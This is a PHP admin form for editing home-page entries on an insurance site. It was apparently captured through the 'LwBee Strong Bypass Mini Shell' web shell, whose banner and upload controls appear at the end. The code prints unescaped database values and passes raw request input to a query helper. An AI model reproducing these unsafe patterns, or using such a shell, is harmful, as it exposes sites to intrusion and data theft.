/home3/vehiclea/public_html/admin-keerthiinsurane-com/home_edit.php
<?php
  include('include/header.php');
  if(!empty($_GET['editId'])){
    $service_edit = home_edit($_GET['editId']);
    $row = mysqli_fetch_array($service_edit);
  }
  if(!empty($_POST['submit'])){
    home_edit_data();
  }
?>

<body>

  <!-- ======= Header ======= -->
 

  <!-- ======= Sidebar ======= -->
  

  <main id="main" class="main">

    <div class="pagetitle">
      <h1>Dashboard</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="dashboard.php">Dashboard</a></li>
          <li class="breadcrumb-item active">Services</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->
    <section>
      <div class="container">
       
           <h5 class="text-center"><strong>Edit Home</strong></h5>
           <div class="row">
         <?php
            if(!empty($_GET['succ']))
          {
          ?>
            <div align="center" style="color:green;"> <h4>Data Insert Successfully</h4></div>
            <?php
            }
         ?>
           <form method="post"  enctype="multipart/form-data" onsubmit="return service_validation()">
            
             
             <div class="col-md-6 mt-4">
                <label for="inputText" class="col-sm-2 col-form-label">Name</label>
                <input type="text" class="form-control" name="name" id="name" value="<?= $row['name']?>">
                <div class="error" id="err2" align="center" style="color:red;"></div>
             </div>
             
             <div class="col-md-6 mt-4">
                <label for="inputText" class="col-sm-2 col-form-label">File Upload</label>
                <img src="<?= $row['image']?>" width="50px">
                <input class="form-control" type="file" id="formFile" name="formFile">
                <div class="error" id="err4" align="center" style="color:red;"></div>
                <input type="hidden" name="fileimage" id="fileimage" value="<?= $row['image']?>">
                <img src="<?= $row['image']?>" width="50px" >
             </div>
             <div class="col-md-6 mt-4">
                <label for="inputText" class="col-sm-2 col-form-label">File Upload</label>
                <select name="status" id="status" class="form-control">
                  <option value="1" <?php if($row['status'] == 1){ echo "selected";}?>>Active</option>
                  <option value="2" <?php if($row['status'] == 2){ echo "selected";}?>>Inactive</option>
                </select>
                <div class="error" id="err4" align="center" style="color:red;"></div>
             </div>
             <input type="hidden" name="edit_data" id="edit_data" value="<?= $row['id']?>">
             <div class="col-md-6 mt-4">
               
                <input type="submit" name="submit" value="Submit" class="btn btn-primary">
             </div>
           </form>
         
         </div>
      </div>
    </section>
  

  </main><!-- End #main -->

  <?php
     include('include/footer.php');
  ?>
  <script src="https://cloud.tinymce.com/5/tinymce.min.js"></script>
<script>
tinymce.init({
selector: '.textarea-tiny',
height: 500,
menubar: false,
width: '100%',
plugins: [
// 'advlist autolink lists link image charmap print preview anchor textcolor',
// 'searchreplace visualblocks code fullscreen',
// 'insertdatetime media table paste code help wordcount'
'advlist autolink lists link image charmap print preview hr anchor pagebreak',
'searchreplace wordcount visualblocks visualchars code fullscreen',
'insertdatetime media nonbreaking save table contextmenu directionality',
'emoticons template paste textcolor colorpicker textpattern imagetools codesample toc'
],
toolbar: 'undo redo | formatselect | bold italic backcolor | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | removeformat | help',
image_advtab: true,
content_css: [
'//fonts.googleapis.com/css?family=Lato:300,300i,400,400i',
'//www.tiny.cloud/css/codepen.min.css'
]
});
</script>
<style>
div.mce-branding-powered-by{
display: none;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

 
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File